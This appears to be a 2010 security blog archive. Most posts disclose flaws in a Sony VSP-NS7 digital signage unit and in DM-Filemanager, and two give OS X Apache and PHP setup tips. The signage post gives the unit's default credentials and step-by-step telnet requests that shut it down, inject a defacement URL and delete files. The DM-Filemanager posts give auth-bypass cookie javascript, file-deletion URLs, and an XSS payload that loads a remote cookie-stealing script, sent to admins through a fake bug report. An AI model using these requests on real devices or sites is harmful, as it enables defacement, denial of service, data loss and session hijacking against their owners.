7
Sep
2010
Sony VSP-NS7 Digital Signage Hacking
Recently I tested out a Sony VSP-NS7 digital signage unit for a customer. This machine really impressed me considering I had used its predecessor the NSP100 and the newer technology was just what the client needed.
After doing some online searching I found that, other than the manual, there wasn’t much information out there on this unit. Knowing that we were going to place this box on a public network, I decided to run a few tests. I began by firing up Wireshark to sniff traffic to and from this box and was very surprised by what I found.
From this research I was able to determine that there is a web server running on port 4980 by default. Next I was able to retrieve the default username and password of the box by decoding the base64 string below.
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
Authorization: Basic NSPXuser:NSPXuser
space
Since this isn’t published anywhere else I have seen, I would guess that not many users of this system know about it. In fact I would dare say that most installations of this system are still using the default username and password since Sony only mentions that the box can be controlled using their additional VSPA-D7 management software. If it costs big bucks it must be good, right?
Below are some of my findings:
Default user information
————————
User: NSPXuser
Pass: NSPXuser
Port: 4980
Found commands
————————
http://ip:4980 – Contains sofware version, unit name, unit and harddrive serial number and MAC address.
http://ip:4980/import/ – Contains all user uploaded content.
http://ip:4980/command.php – Uses several get variables to control the box.
http://ip:4980/upload.php – Used in conjunction with get variables to send content to the box.
http://ip:4980/command.php?cmd=NLOG&comp=cab - Download system logs.
http://ip:4980/command.php?cmd=SLOG – Displays system logs.
http://ip:4980/command.php?cmd=SYST – System statistics.
http://ip:4980/command.php?cmd=DRST – Harddrive statistics.
http://ip:4980/command.php?cmd=PLCL – Play files.
http://ip:4980/command.php?cmd=SPCL – Stop playing files.
http://ip:4980/command.php?cmd=CLST&table=web – List files based on type – web, still, movie and text.
http://ip:4980/command.php?cmd=LCNF – Load configuration files.
http://ip:4980/command.php?cmd=RMCL – Remove files.
http://ip:4980/command.php?cmd=LTBL – Load tables.
Power off and restart
————————
http://ip:4980/command.php?cmd=RSET&shutdown – Turn the unit off
http://ip:4980/command.php?cmd=RSET&reboot – Restart unit
space
Shutdown Sony VSP-NS7
Fire up a telnet session and enter:
telnet ip 4980 Trying ip... Connected to ip. Escape character is '^]'. GET /command.php?cmd=RSET&shutdown HTTP/1.1 Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI= User-Agent: VSP-NS7 HTTP Connection Host: ip:4980 Cache-Control: no-cache
Without any warning the unit will shut down and have to be restarted from the box or management software if the network allows magic packets.
URL Injection/Defacement Sony VSP-NS7
Fire up a telnet session and enter:
telnet ip 4980 Trying ip... Connected to ip. Escape character is '^]'. PUT /upload.php?href=/import/db/property0.xml&append=0&mkdir=0 HTTP/1.1 Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI= User-Agent: VSP-NS7 HTTP Connection Host: ip:4980 Content-Length: 601 Cache-Control: no-cache <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <content ver="1.0" date="2010-09-06" time="21:28:43"> <delete table="WEB_TBL"> <index>004000003</index> </delete> <insert table="WEB_TBL"> <index>004000003</index> <cdate>2010-09-06 21:21:55.678</cdate> <title>Pwnage</title> <size>0</size> <deldate>2010-10-06</deldate> <link>http://blog.ndarkness.com/?p=577</link> <info>Pwned</info> <change>01</change> <width>0</width> <height>0</height> <xoffset>0</xoffset> <yoffset>0</yoffset> <xoption>0</xoption> <xreload>0</xreload> </insert> </content>
Next we write the group file.
telnet ip 4980 Trying ip... Connected to ip. Escape character is '^]'. PUT /upload.php?href=/import/group0.xml&append=0&mkdir=0 HTTP/1.1 Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI= User-Agent: VSP-NS7 HTTP Connection Host: ip:4980 Content-Length: 185 Cache-Control: no-cache <?xml version="1.0" encoding="UTF-8"?> <group ver="1.0" date="2010-09-06" time="21:28:43"> <property date="2010-09-06" time="21:28:43">/import/db/property0.xml</property> </group>
Now we need to load the file.
telnet ip 4980 Trying ip... Connected to ip. Escape character is '^]'. GET /command.php?cmd=LTBL&file=/import/group0.xml&mode=2 HTTP/1.1 Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI= User-Agent: VSP-NS7 HTTP Connection Host: ip:4980 Cache-Control: no-cache
Finally let’s force the unit to call our url.
telnet ip 4980 Trying ip... Connected to ip. Escape character is '^]'. GET /command.php?cmd=PLCL&id=06&index=004000003 HTTP/1.1 Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI= User-Agent: VSP-NS7 HTTP Connection Host: ip:4980 Cache-Control: no-cache
Delete Files From Sony VSP-NS7
First we need to obtain a list of images on the unit.
Fire up a telnet session and enter:
telnet ip 4980 Trying ip... Connected to ip. Escape character is '^]'. GET /command.php?cmd=CLST&table=still HTTP/1.1 Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI= User-Agent: VSP-NS7 HTTP Connection Host: ip:4980 Cache-Control: no-cache
Now we simply select the image we want to delete and enter the following:
telnet ip 4980 Trying ip... Connected to ip. Escape character is '^]'. GET /command.php?cmd=RMCL&table=still&index=002000002 HTTP/1.1 Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI= User-Agent: VSP-NS7 HTTP Connection Host: ip:4980 Cache-Control: no-cache
The VSPA-D7 management software does allow the default password and port to be changed but if the traffic is sniffed, the password can be easily decoded again. Not to mention we can use similar attack method to change the password of the box and lock the administrator out. Talk about a denial of service!
The only secure solution for this unit, is to use a crossover cable and directly connect to the box or put it on a network by itself. If you leave it on a public network it is only a matter of time before it falls prey to one of the attacks listed above.
GHTime Code(s): a3876
6
Sep
2010
OS X – Apache Web Sharing Starts But You Are Unable Connect
In an effort to save you an afternoon of searching, I thought I would post this to help the OS X users having this issue. There are the usual causes of no content in the web root, firewall blocking requests, incorrect permissions and/or httpd.conf syntax errors. The one error that is a little tougher to track down is apache not being able to create log files. Check the line in the httpd.conf file that shows the path to apache’s log file. It should look something like this:
ErrorLog “/private/var/log/apache2/error_log”
Now if the directory apache2 does not exist in /private/var/log/, apache will fail to start without giving you much of an error message. To correct this, in terminal type:
sudo mkdir /private/var/log/apache2
Enter your admin password and restart apache either in System Preferences=>Sharing=>Web Sharing or in terminal by typing:
sudo apachectl restart
Once this is done, enter your web address in the web browser and you should see your pages load. Hope this helps!
GHTime Code(s): 1ec37
28
Aug
2010
DM-Filemanager 3.9.6-9 Multiple Vulnerabilities
The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.
During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.
The next major issues we found with DM-Filemanager version 3.9.6 – 3.9.7-9* dealt with several vulnerabilities. Below is the method used to exploit this vulnerability and a list of possible exploits. Please be aware that this has since been fixed and is no longer vulnerable.
I discovered that direct calls to ajax.php, code.php and rich.php are not properly validated. Possible exploits for this vulnerability are file disclosure, loss of data and sensitive information, XSS (via source code editing), session hijacking (via XSS), web site defacement and database manipulation/exposure.
*You must use:
javascript:void(document.cookie="USER=someadminuser"); void(document.cookie="USERID=50");void(document.cookie="GROUP=ADMINISTRATORS"); void(document.cookie="GROUPID=1");
Create a new file (see edit below for an easier method):
http://localhost/dm-filemanager/ajax.php?newfile=yes&filename=index.php
Download files:
http://localhost/dm-filemanager/?download=yes&file=settings.php&currdir=/dm-filemanager/
Rename:
http://localhost/dm-filemanager/ajax.php?file=index.shtml&currdir=/&destination=/&rn=yes&newname=index.html
Copy:
http://localhost/dm-filemanager/ajax.php?file=config.php&currdir=/&destination=/&cp=yes
Edit: (This one has potential 
)
http://localhost/dm-filemanager/code.php?editfile=yes&file=exploit.php&currdir=/
Delete File:
http://localhost/dm-filemanager/ajax.php?delete=yes&file=index.php&currdir=/wp/&destination=/wp/
Delete Folders:
http://localhost/dm-filemanager/ajax.php?currdir=/wp/&rmdir=yes&folder=/wp/wp-admin&dir=wp-admin
All DM-Filemanager users are strongly encouraged to upgrade their software to the latest version.
GHTime Code(s): f73e1
19
May
2010
Mac OS X – Update PHP, MySQL and Easily Add GD Support
If you have ever tried compiling the GD library on Mac OS X, you know that there are several issues to overcome before it is usable. Not to mention the version of PHP included with OS X wasn’t compiled with this option. In this post I will detail an easy method to update PHP, install MySQL and the GD library in just a few steps.
To start this process, we need to grab a couple of install packages from the links listed below:
- MySQL for your version of OS X.
- Marc Liyanage’s PHP Apache Module.
Once you have these packages downloaded, we can start by installing MySQL. Open the MySQL image and install the package by following the directions. When the install process finishes, copy the MySQL.prefPane to “your_user/Library/PreferencePanes”. Doing this allows you to start and stop the server from the system preferences window. Finally, make sure you take the time to secure your new installation.
If you had previously enabled the PHP module in the httpd.conf file, make sure you comment it back out.
Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)
- First type: “vi /etc/apache2/httpd.conf”
- Find the PHP module:
LoadModule php5_module libexec/apache2/libphp5.so - Type: “i” and change the line to read:
#LoadModule php5_module libexec/apache2/libphp5.so - Now press the “esc” key, type “:wq” and press “enter”
The next step in this process is to install an updated version of PHP with GD support. The great thing about using the Entropy package, is that all of the hard work is already done for you! Open the installer and click the customize button if you don’t need all of the included extensions.
Once you have chosen the extensions you need, click install. When the install finishes, the last thing we need to do is edit the php.ini.
Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)
- First type: “vi /usr/local/php5/lib/php.ini”
- Now type: “?mysql” and scroll up until you get to the lines that look like this:
mysql.default_socket = /tmp/mysql.sock
mysqli.default_socket = /tmp/mysql.sock - Type “i” and change them to:
mysql.default_socket = /var/mysql/mysql.sock
mysqli.default_socket = /var/mysql/mysql.sock - Finally press the “esc” key, type “:wq” and press “enter”
Now all you have to do is start Web Sharing from the system preferences window and all of your new features will be ready to use.
GHTime Code(s): nc nc 087f6
30
Jan
2010
DM-FileManager 3.9.9 XSS Vulnerability
The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.
During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.
DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.
This example shows nDarkness.com in an iframe within the login page:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;message=&lt;p align=center&gt;&lt;iframe src=http://ndarkness.com width=100% height=800&gt;&lt;/iframe&gt;&lt;/p&gt;
Here is a url encoded version:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
and one step farther is the cookie stealer script:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;message=&lt;SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js&gt;&lt;/SCRIPT&gt;
Here is a url encoded version:
http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E
A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.
Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.
http://localhost/~safety/dm-filemanager/login.php?referrer=/&amp;message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&amp;rmdir=yes&amp;folder=/safety/Sites/wp/wp-admin&amp;dir=wp-admin
DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.
GHTime Code(s): 262b5 e4f3d f515c nc